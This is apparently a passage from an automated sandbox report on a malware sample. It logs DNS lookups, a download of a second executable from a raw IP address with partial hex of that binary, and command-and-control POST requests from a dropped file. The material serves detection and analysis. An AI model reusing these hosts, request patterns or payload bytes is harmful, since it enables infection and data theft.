                                                                                              Dec 18, 2024 13:49:42.735716105 CET49714443192.168.2.8172.67.220.223
                                                                                              Dec 18, 2024 13:49:42.735728979 CET44349714172.67.220.223192.168.2.8
                                                                                              Dec 18, 2024 13:49:44.394452095 CET44349714172.67.220.223192.168.2.8
                                                                                              Dec 18, 2024 13:49:44.394582987 CET44349714172.67.220.223192.168.2.8
                                                                                              Dec 18, 2024 13:49:44.394671917 CET49714443192.168.2.8172.67.220.223
                                                                                              Dec 18, 2024 13:49:44.394884109 CET49714443192.168.2.8172.67.220.223
                                                                                              Dec 18, 2024 13:49:44.394906044 CET44349714172.67.220.223192.168.2.8
                                                                                              Dec 18, 2024 13:51:13.710748911 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:51:14.024220943 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:51:14.647809982 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:51:15.882194042 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:51:18.335325003 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:51:23.227464914 CET4970580192.168.2.8176.113.115.19
                                                                                              Dec 18, 2024 13:51:32.991908073 CET4970580192.168.2.8176.113.115.19
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 18, 2024 13:49:23.732578039 CET4932753192.168.2.81.1.1.1
                                                                                              Dec 18, 2024 13:49:23.997487068 CET53493271.1.1.1192.168.2.8
                                                                                              Dec 18, 2024 13:49:31.512749910 CET6527753192.168.2.81.1.1.1
                                                                                              Dec 18, 2024 13:49:31.994019985 CET53652771.1.1.1192.168.2.8
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 18, 2024 13:49:23.732578039 CET192.168.2.81.1.1.10x189dStandard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:49:31.512749910 CET192.168.2.81.1.1.10xb75cStandard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 18, 2024 13:49:23.997487068 CET1.1.1.1192.168.2.80x189dNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:49:23.997487068 CET1.1.1.1192.168.2.80x189dNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:49:31.994019985 CET1.1.1.1192.168.2.80xb75cNo error (0)rapeflowwj.lat172.67.220.223A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:49:31.994019985 CET1.1.1.1192.168.2.80xb75cNo error (0)rapeflowwj.lat104.21.24.223A (IP address)IN (0x0001)false
                                                                                              • post-to-me.com
                                                                                              • rapeflowwj.lat
                                                                                              • 176.113.115.19
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.849705176.113.115.19806664C:\Users\user\Desktop\InstallSetup.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 18, 2024 13:49:26.399105072 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                              User-Agent: ShareScreen
                                                                                              Host: 176.113.115.19
                                                                                              Dec 18, 2024 13:49:27.726911068 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 12:49:27 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Wed, 18 Dec 2024 12:45:01 GMT
                                                                                              ETag: "59e00-6298ac83d9e2c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 368128
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wBA3#3#3#lK2#-qY-#-qH'#-q^]#6#3#@#-qW2#-qI2#-qL2#Rich3#PELXg_e*?@0C(<B.text `.rdata!"@@.data=@p@.rsrcB@@
                                                                                              Dec 18, 2024 13:49:27.726962090 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 64 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 f9 09 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08
                                                                                              Data Ascii: %dD;@DuUQeVEPuupu9EttM^jh$Deu;5w"jYeVYEEEjYUVuSW
                                                                                              Dec 18, 2024 13:49:27.727119923 CET1236INData Raw: 8b 3d 9c 10 44 00 83 3d 8c 6f 44 00 00 75 18 e8 63 1f 00 00 6a 1e e8 b1 1d 00 00 68 ff 00 00 00 e8 f3 1a 00 00 59 59 a1 78 b4 81 00 83 f8 01 75 0e 85 f6 74 04 8b c6 eb 03 33 c0 40 50 eb 1c 83 f8 03 75 0b 56 e8 53 ff ff ff 59 85 c0 75 16 85 f6 75
                                                                                              Data Ascii: =D=oDucjhYYxut3@PuVSYuuFVj5oDu.j^9rDtuAYtu{00_[VY3^]jh%D3}3u;;u WWWWW%
                                                                                              Dec 18, 2024 13:49:27.727166891 CET1236INData Raw: 00 0f 85 46 ff ff ff e9 55 ff ff ff 33 c0 85 f6 0f 95 c0 33 ff 47 50 8b 45 f0 56 57 53 6a 09 ff 70 04 ff 15 a0 10 44 00 85 c0 0f 84 34 ff ff ff 8b 45 08 85 c0 0f 84 cb fe ff ff 89 38 e9 c4 fe ff ff 8b 45 08 3b c1 74 02 89 08 33 c0 5f c9 c3 8b ff
                                                                                              Data Ascii: FU33GPEVWSjpD4E8E;t3_UQMES]VtukDujuukDjjD3MQE^[Ujju4]jh@%D]uuGYuuS%8Y=x
                                                                                              Dec 18, 2024 13:49:27.727180958 CET448INData Raw: 8c 2d f4 6b 44 00 9c 8f 05 28 6c 44 00 8b 45 00 a3 1c 6c 44 00 8b 45 04 a3 20 6c 44 00 8d 45 08 a3 2c 6c 44 00 8b 85 e0 fc ff ff c7 05 68 6b 44 00 01 00 01 00 a1 20 6c 44 00 a3 1c 6b 44 00 c7 05 10 6b 44 00 09 04 00 c0 c7 05 14 6b 44 00 01 00 00
                                                                                              Data Ascii: -kD(lDElDE lDE,lDhkD lDkDkDkD@D@DD`kDj;YjDhDD=`kDuj;YhDPDUE3;@DtA-rHwjX]@D]DjY;#
                                                                                              Dec 18, 2024 13:49:27.727324963 CET1236INData Raw: 59 89 7d fc ff 75 08 e8 1f 0a 00 00 59 89 45 e4 c7 45 fc fe ff ff ff e8 5f 00 00 00 8b 5d e4 3b df 74 11 ff 75 08 57 53 e8 43 3a 00 00 83 c4 0c 3b df 75 61 56 6a 08 ff 35 8c 6f 44 00 ff 15 9c 10 44 00 8b d8 3b df 75 4c 39 3d e0 72 44 00 74 33 56
                                                                                              Data Ascii: Y}uYEE_];tuWSC:;uaVj5oDD;uL9=rDt3VYrE;PE3ujY;uE;tVW38nD<ADuAD8h0/:YYtF$|3@_^$AD3SDV
                                                                                              Dec 18, 2024 13:49:27.727339029 CET1236INData Raw: 00 00 80 d3 ea 09 50 08 a1 88 6f 44 00 8b 40 10 8b 0d 94 b4 81 00 83 a4 88 c4 00 00 00 00 a1 88 6f 44 00 8b 40 10 fe 48 43 a1 88 6f 44 00 8b 48 10 80 79 43 00 75 09 83 60 04 fe a1 88 6f 44 00 83 78 08 ff 75 65 53 6a 00 ff 70 0c ff d6 a1 88 6f 44
                                                                                              Data Ascii: PoD@oD@HCoDHyCu`oDxueSjpoDpj5oDDoDk+LQHQP6E;oDvmEoD=[_^V5W3;u4kP5W5oDD;u3x
                                                                                              Dec 18, 2024 13:49:27.727382898 CET1236INData Raw: f1 8b 79 04 89 4b 08 89 7b 04 89 59 04 8b 4b 04 89 59 08 8b 4b 04 3b 4b 08 75 57 8a 4c 06 04 88 4d 0f fe c1 88 4c 06 04 83 fe 20 73 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b 4d 08 09 39 8d 44 90 44 8b ce eb 20 80 7d 0f 00 75 10 8d 4e e0
                                                                                              Data Ascii: yK{YKYK;KuWLML s}uM9DD }uNMyNED3@_^[UMkMSI VW}M3US;#U#u];r;u
                                                                                              Dec 18, 2024 13:49:27.727395058 CET1236INData Raw: 7c b4 81 00 83 c4 08 8b 4d 0c e8 5f 31 00 00 8b 45 0c 39 58 0c 74 12 68 04 40 44 00 57 8b d3 8b c8 e8 62 31 00 00 8b 45 0c 8b 4d f8 89 48 0c 8b 06 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 27 e5 ff ff 8b 4e 0c 8b 56 08 03 cf 33 0c 3a e8 17 e5 ff
                                                                                              Data Ascii: |M_1E9Xth@DWb1EMHtN38'NV3:EH09SRh@DW1U39EjhPDoDu]3@x]UWWDu(D`wt_]Uu
                                                                                              Dec 18, 2024 13:49:27.727406025 CET328INData Raw: 03 b9 dc 72 44 00 68 94 17 44 00 2b c8 51 50 e8 81 32 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 7d 06 00 00 83 c4 14 eb 02 33 f6 68 90 17 44 00 53 57 e8 e7 31 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 59 06 00 00 83 c4 14 8b 45 fc ff
                                                                                              Data Ascii: rDhD+QP2t3VVVVV}3hDSW1tVVVVVYE4BDSW1tVVVVV4h hhDW502jD;t$tjEP4BD62YP6SD_^[j}3Ytjp3Yu=@Duh)h
                                                                                              Dec 18, 2024 13:49:27.847012997 CET1236INData Raw: 06 3b c6 7d 07 8b c6 a3 60 b4 81 00 6a 04 50 e8 78 0c 00 00 59 59 a3 40 a4 81 00 85 c0 75 1e 6a 04 56 89 35 60 b4 81 00 e8 5f 0c 00 00 59 59 a3 40 a4 81 00 85 c0 75 05 6a 1a 58 5e c3 33 d2 b9 60 43 44 00 eb 05 a1 40 a4 81 00 89 0c 02 83 c1 20 83
                                                                                              Data Ascii: ;}`jPxYY@ujV5`_YY@ujX^3`CD@ ED|j^3pCDW@t;tu1 BCD|_3^4=oDt25@!YUVu`CD;r"EDw+QNY


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.849704172.67.179.2074436664C:\Users\user\Desktop\InstallSetup.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:49:25 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                              User-Agent: ShareScreen
                                                                                              Host: post-to-me.com
                                                                                              2024-12-18 12:49:26 UTC802INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 12:49:25 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeIkCXZlrXOfJirl2%2BEixumLQFFtqp6dCB%2Fvf2Bdk%2BpbeToBX1MreWbKTlxomXnRMnIbzRn%2BXQjgYC7FBSqact4NtAsMEVrVEaIK7PmMihWKaWczfLIVM4O2m25go4Xjfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f3f45d829654400-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2042&rtt_var=773&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1408586&cwnd=155&unsent_bytes=0&cid=f872e2f78a24a573&ts=919&x=0"
                                                                                              2024-12-18 12:49:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-18 12:49:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.849706172.67.220.2234433032C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:49:33 UTC261OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: rapeflowwj.lat
                                                                                              2024-12-18 12:49:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-18 12:49:33 UTC1031INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 12:49:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=si4jkb63r39s0gac9cq6j63i5j; expires=Sun, 13-Apr-2025 06:36:12 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWqNLKyQXSTo1OOy8sa9czg0gs6XgvnVm3rtMgYXhY5Sty8IxnOi289obss8po30qIsjpDm6LEK4rUFWuXAepm%2FmMdMM6DjUQ6M8KirHS5UjHUy69PndMjZTulZ7FFEg3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f3f4608ab1842f4-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1719&rtt_var=859&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4208&recv_bytes=905&delivery_rate=177432&cwnd=231&unsent_bytes=0&cid=899f79afac1510e0&ts=751&x=0"
                                                                                              2024-12-18 12:49:33 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-18 12:49:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.849707172.67.220.2234433032C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:49:35 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 74
                                                                                              Host: rapeflowwj.lat
                                                                                              2024-12-18 12:49:35 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                              2024-12-18 12:49:36 UTC1038INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 12:49:35 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=imj4vmih9o6234g9ea1bs76f6i; expires=Sun, 13-Apr-2025 06:36:14 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dyz5wtJN6w7G5%2BuSNKnGBbA8tDV9lWAHwUAnrB7YlEw4PkHf4UyXWj2GPFkNzbPgIn3lqzElfPzBhQ5j%2B3eoW2%2F9AhDR2YK5KGvQKc0rphKmg8zBaCUw%2FQtArn93jm0Sbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f3f4614eff1439a-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1779&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=972&delivery_rate=1611479&cwnd=233&unsent_bytes=0&cid=72a6336eee7966da&ts=832&x=0"
                                                                                              2024-12-18 12:49:36 UTC331INData Raw: 31 64 33 34 0d 0a 55 74 77 78 6b 43 70 61 2f 78 4e 44 44 79 54 66 79 69 4f 59 54 66 6b 52 48 69 73 34 5a 4d 42 33 7a 56 2b 36 73 4f 74 62 71 64 30 70 2f 6b 65 79 45 47 37 54 4d 54 42 71 42 75 57 2b 55 65 30 6f 31 54 4e 2f 54 78 70 65 70 68 61 68 4c 4e 2b 63 79 53 33 45 2f 32 69 36 55 50 78 5a 50 39 4d 78 4a 6e 63 47 35 5a 46 59 75 69 69 58 4d 79 51 4a 58 51 36 69 46 71 45 39 32 39 75 45 4b 38 57 2b 4f 72 42 57 2b 45 38 35 6d 33 49 76 59 6b 47 36 72 30 4c 79 49 35 42 38 64 6b 59 61 53 4f 49 53 74 33 32 41 6b 71 59 2b 33 62 77 66 76 55 4c 37 43 43 66 54 61 47 46 71 53 76 33 77 41 66 6b 6f 6d 33 31 34 54 31 4d 4d 71 42 2b 70 50 4e 37 61 6d 7a 4c 50 74 54 71 2b 56 66 6c 46 4d 49 39 2f 4a 57 56 4b 76 4b 56 43 75 6d 48 62 64 47 51 4a 41 6b 62 78 4a 36 77 73 79
                                                                                              Data Ascii: 1d34UtwxkCpa/xNDDyTfyiOYTfkRHis4ZMB3zV+6sOtbqd0p/keyEG7TMTBqBuW+Ue0o1TN/TxpephahLN+cyS3E/2i6UPxZP9MxJncG5ZFYuiiXMyQJXQ6iFqE929uEK8W+OrBW+E85m3IvYkG6r0LyI5B8dkYaSOISt32AkqY+3bwfvUL7CCfTaGFqSv3wAfkom314T1MMqB+pPN7amzLPtTq+VflFMI9/JWVKvKVCumHbdGQJAkbxJ6wsy
                                                                                              2024-12-18 12:49:36 UTC1369INData Raw: 6c 6b 53 72 77 54 76 49 70 62 4c 79 54 37 48 2f 32 6a 2b 56 66 78 4a 4e 5a 31 6a 4b 57 5a 4e 75 4c 70 4b 38 79 4b 57 63 33 46 44 56 51 57 69 45 71 55 33 31 39 69 4e 4e 4d 61 35 4d 4c 34 54 76 41 67 2f 68 54 46 35 4c 57 57 34 75 45 62 32 4f 64 6c 4a 50 46 59 55 48 2b 49 53 6f 33 32 41 6b 6f 45 38 79 4c 77 37 73 56 44 36 51 79 71 64 59 79 64 67 51 36 2b 75 52 50 51 6c 6d 47 46 32 52 31 77 46 71 78 36 6d 4f 4e 2f 57 79 58 65 4c 75 43 6a 2b 43 37 4a 70 4e 5a 5a 39 4b 33 70 47 2f 62 63 50 34 32 2b 63 66 7a 77 52 47 67 4b 6a 45 61 34 35 31 74 79 4e 4e 63 32 78 50 62 46 56 2b 45 67 2f 6c 33 6b 70 62 45 75 32 70 30 48 2f 49 70 39 31 63 45 68 66 52 75 78 56 71 43 57 59 69 73 6b 58 7a 4c 77 69 2f 47 62 78 52 6a 61 61 5a 32 46 79 43 4b 54 6f 52 76 5a 76 77 7a 4e 79
                                                                                              Data Ascii: lkSrwTvIpbLyT7H/2j+VfxJNZ1jKWZNuLpK8yKWc3FDVQWiEqU319iNNMa5ML4TvAg/hTF5LWW4uEb2OdlJPFYUH+ISo32AkoE8yLw7sVD6QyqdYydgQ6+uRPQlmGF2R1wFqx6mON/WyXeLuCj+C7JpNZZ9K3pG/bcP42+cfzwRGgKjEa451tyNNc2xPbFV+Eg/l3kpbEu2p0H/Ip91cEhfRuxVqCWYiskXzLwi/GbxRjaaZ2FyCKToRvZvwzNy
                                                                                              2024-12-18 12:49:36 UTC1369INData Raw: 4a 62 37 7a 72 41 6b 74 46 35 2b 71 67 37 2f 47 62 78 52 6a 61 61 5a 32 46 79 43 4b 54 6f 52 76 5a 76 77 7a 4e 78 51 56 38 44 72 52 53 6c 4d 39 33 59 68 54 48 46 76 43 4b 78 56 2f 4a 45 4d 4a 64 38 4c 32 6c 4f 74 4b 4e 4b 2f 43 2b 61 65 54 77 48 47 67 47 36 56 66 64 39 37 4e 57 46 4e 4d 54 39 42 62 31 64 2f 45 38 75 33 57 35 76 64 41 61 36 70 41 47 69 62 35 64 36 66 45 4a 51 41 71 49 53 6f 6a 6a 62 31 59 6f 30 7a 4c 55 2b 75 56 66 2b 51 54 57 62 63 53 5a 70 51 36 2b 74 53 50 59 6a 32 7a 30 38 54 6b 4a 47 2b 6c 57 41 4f 73 37 52 70 6a 72 61 74 6e 43 68 48 65 73 49 50 35 45 78 65 53 31 42 75 4b 42 4b 2f 43 65 62 59 58 6c 48 55 51 65 6f 45 36 34 77 31 4e 53 4a 4f 4d 75 35 50 4c 35 55 39 56 6f 71 6d 48 63 7a 5a 77 62 7a 36 45 62 69 62 38 4d 7a 53 6c 6c 4e 46
                                                                                              Data Ascii: Jb7zrAktF5+qg7/GbxRjaaZ2FyCKToRvZvwzNxQV8DrRSlM93YhTHFvCKxV/JEMJd8L2lOtKNK/C+aeTwHGgG6Vfd97NWFNMT9Bb1d/E8u3W5vdAa6pAGib5d6fEJQAqISojjb1Yo0zLU+uVf+QTWbcSZpQ6+tSPYj2z08TkJG+lWAOs7RpjratnChHesIP5ExeS1BuKBK/CebYXlHUQeoE64w1NSJOMu5PL5U9VoqmHczZwbz6Ebib8MzSllNF
                                                                                              2024-12-18 12:49:36 UTC1369INData Raw: 30 31 39 71 42 4e 73 53 37 50 72 68 56 2f 30 30 33 6c 32 4d 70 59 30 75 32 70 30 72 6f 4c 35 5a 33 63 45 31 53 44 61 68 56 34 58 33 66 79 73 6c 68 69 34 6f 39 73 56 50 78 58 6e 69 43 50 7a 67 74 51 62 48 6f 47 62 6f 6a 6c 58 4e 7a 52 56 59 4e 71 68 53 6a 4d 39 2f 58 67 44 48 44 72 54 47 36 57 2f 4e 47 4e 35 78 31 4a 47 68 43 75 71 78 48 39 57 2f 56 4d 33 74 52 47 6c 37 69 4f 6f 67 49 6d 76 4f 7a 65 64 54 78 4b 66 35 55 2f 67 68 67 33 58 30 69 59 55 36 79 72 6b 6a 32 4a 5a 4a 34 63 45 4a 65 43 71 73 51 71 54 7a 64 31 34 67 39 78 37 55 32 76 56 44 39 52 7a 65 56 4d 57 38 74 51 61 58 6f 47 62 6f 4b 6a 48 68 79 54 78 6f 5a 37 41 7a 76 4f 74 53 53 30 58 6e 48 74 6a 61 34 56 76 35 4a 50 70 56 30 4b 57 6c 48 75 36 35 43 39 53 75 65 63 6e 4e 4e 56 67 69 6f 46 4b
                                                                                              Data Ascii: 019qBNsS7PrhV/003l2MpY0u2p0roL5Z3cE1SDahV4X3fyslhi4o9sVPxXniCPzgtQbHoGbojlXNzRVYNqhSjM9/XgDHDrTG6W/NGN5x1JGhCuqxH9W/VM3tRGl7iOogImvOzedTxKf5U/ghg3X0iYU6yrkj2JZJ4cEJeCqsQqTzd14g9x7U2vVD9RzeVMW8tQaXoGboKjHhyTxoZ7AzvOtSS0XnHtja4Vv5JPpV0KWlHu65C9SuecnNNVgioFK
                                                                                              2024-12-18 12:49:36 UTC1369INData Raw: 6d 7a 37 45 75 7a 65 79 56 66 31 4f 4f 5a 68 37 4c 57 70 44 74 71 64 4e 75 6d 48 62 64 47 51 4a 41 6b 61 4d 48 72 77 71 32 39 79 43 4c 39 44 2f 4c 2f 42 4b 73 6b 38 30 33 53 6c 68 62 6b 32 32 72 45 48 32 4c 35 39 2b 66 46 74 56 41 61 55 63 70 43 2f 53 31 59 34 79 77 37 51 2f 75 45 48 2b 52 69 71 59 59 7a 4d 74 43 50 32 76 57 62 70 33 32 30 56 37 57 55 6f 46 34 43 53 35 50 73 37 5a 68 44 57 4c 6f 48 36 6e 45 2f 56 45 65 4d 55 78 4a 32 4a 50 76 71 64 41 38 79 4f 57 64 6e 56 4d 57 77 43 6d 48 36 55 39 33 74 53 49 50 4d 47 38 4d 62 52 61 39 55 41 2f 6e 6d 4e 68 49 77 61 36 73 41 47 69 62 37 4a 30 62 6b 64 4b 52 72 31 62 74 6e 33 66 33 73 6c 68 69 37 73 36 73 56 66 31 52 44 36 59 64 79 78 73 53 62 79 6f 54 76 34 6b 6b 6e 56 39 52 46 38 4c 70 67 65 6c 4e 74 66
                                                                                              Data Ascii: mz7EuzeyVf1OOZh7LWpDtqdNumHbdGQJAkaMHrwq29yCL9D/L/BKsk803Slhbk22rEH2L59+fFtVAaUcpC/S1Y4yw7Q/uEH+RiqYYzMtCP2vWbp320V7WUoF4CS5Ps7ZhDWLoH6nE/VEeMUxJ2JPvqdA8yOWdnVMWwCmH6U93tSIPMG8MbRa9UA/nmNhIwa6sAGib7J0bkdKRr1btn3f3slhi7s6sVf1RD6YdyxsSbyoTv4kknV9RF8LpgelNtf
                                                                                              2024-12-18 12:49:36 UTC1369INData Raw: 37 55 31 74 46 37 78 52 7a 75 50 63 43 64 2f 52 72 43 69 55 2f 41 6b 6e 6e 35 78 52 46 6b 41 70 42 36 6a 4c 39 48 53 69 6a 4b 4c 38 58 43 35 53 37 49 51 65 4c 35 6d 4e 32 64 42 73 62 35 4b 2b 79 79 4e 66 6d 77 4a 46 45 61 7a 45 72 35 39 67 4d 53 5a 4c 73 79 67 66 71 63 54 39 55 52 34 78 54 45 6e 5a 45 43 36 72 6b 2f 6f 4b 70 31 38 63 30 42 54 41 71 6f 57 72 7a 6e 63 31 59 77 36 78 37 51 33 76 56 7a 32 51 54 61 55 66 6d 45 6a 42 72 71 77 41 61 4a 76 75 6d 68 2f 52 56 64 47 76 56 75 32 66 64 2f 65 79 57 47 4c 73 7a 36 37 55 2f 68 4f 50 4a 68 33 4b 32 68 47 74 71 74 4f 2f 69 6d 66 66 48 78 43 55 77 65 6b 45 4b 55 32 33 74 2b 4b 50 38 33 2f 66 76 35 55 36 67 68 67 33 56 45 36 59 45 71 36 36 46 36 30 4e 74 74 30 63 41 6b 43 52 71 6b 5a 71 7a 72 59 33 34 6f 78
                                                                                              Data Ascii: 7U1tF7xRzuPcCd/RrCiU/Aknn5xRFkApB6jL9HSijKL8XC5S7IQeL5mN2dBsb5K+yyNfmwJFEazEr59gMSZLsygfqcT9UR4xTEnZEC6rk/oKp18c0BTAqoWrznc1Yw6x7Q3vVz2QTaUfmEjBrqwAaJvumh/RVdGvVu2fd/eyWGLsz67U/hOPJh3K2hGtqtO/imffHxCUwekEKU23t+KP83/fv5U6ghg3VE6YEq66F60Ntt0cAkCRqkZqzrY34ox
